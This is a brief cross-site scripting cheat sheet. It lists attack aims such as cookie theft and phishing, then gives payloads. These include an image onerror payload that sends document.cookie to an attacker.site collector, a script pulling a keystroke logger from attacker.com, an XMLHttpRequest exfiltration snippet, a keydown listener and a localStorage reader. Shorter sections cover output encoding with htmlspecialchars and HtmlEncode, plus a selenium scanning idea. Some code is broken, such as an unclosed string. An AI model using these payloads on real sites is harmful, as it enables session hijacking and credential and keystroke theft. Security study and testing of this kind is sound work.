Cross-Site-Scripting just for fun.
- Steal cookies for session hijacking.
- Modify Webpage to perform phishing.
- Inject malicious code.
- <script>alert(1)</script>
- <script src=https://attacker.com/keystroke.js > </script>
- To include malicious javascript code in page.
- <img src=anything onerror=alert(1) >
- When the <script> is being filtered by the Web Application, you can use javascript events.
- <script>alert(localStorage.getItem('salary'))</script>
- To collect sensitive information stored in Browser Local Storage.
- <img src=error onerror=this.src='http://attacker.site/collector.php?data='+document.cookie >
- This payload starts a loop, so the browser start sending multiple requests to the attacker server with the cookie.
- To perform HTTP GET request
var xhttp = new XMLHttpRequest(); //Init xhttp object
xhttp.open("GET", "https://attacker.site/strokes.php?data=data, true); //GET request
xhttp.send(); //Send request
- Collect pressed key
document.addEventListener("keydown",function(e){
pressed_key = e.key;
}
Using htmlspecialchars to convert special characters to HTML.
$word = htmlspecialchars($_GET['word']);
Using HtmlEncode to convert special characters to HTML.
user_input = System.Web.HttpUtility.HtmlEncode(user_input);
So this <script>alert(1)</script> becomes this <script>alert(1)</script>
Using selenium to find input fields and inject payloads, if the injection is sucessful, a printscreen is made.
- ASP NET Server.HTMLEncode https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525347%28v%3dvs.90%29
- PHP html specialchars https://www.php.net/manual/en/function.htmlspecialchars.php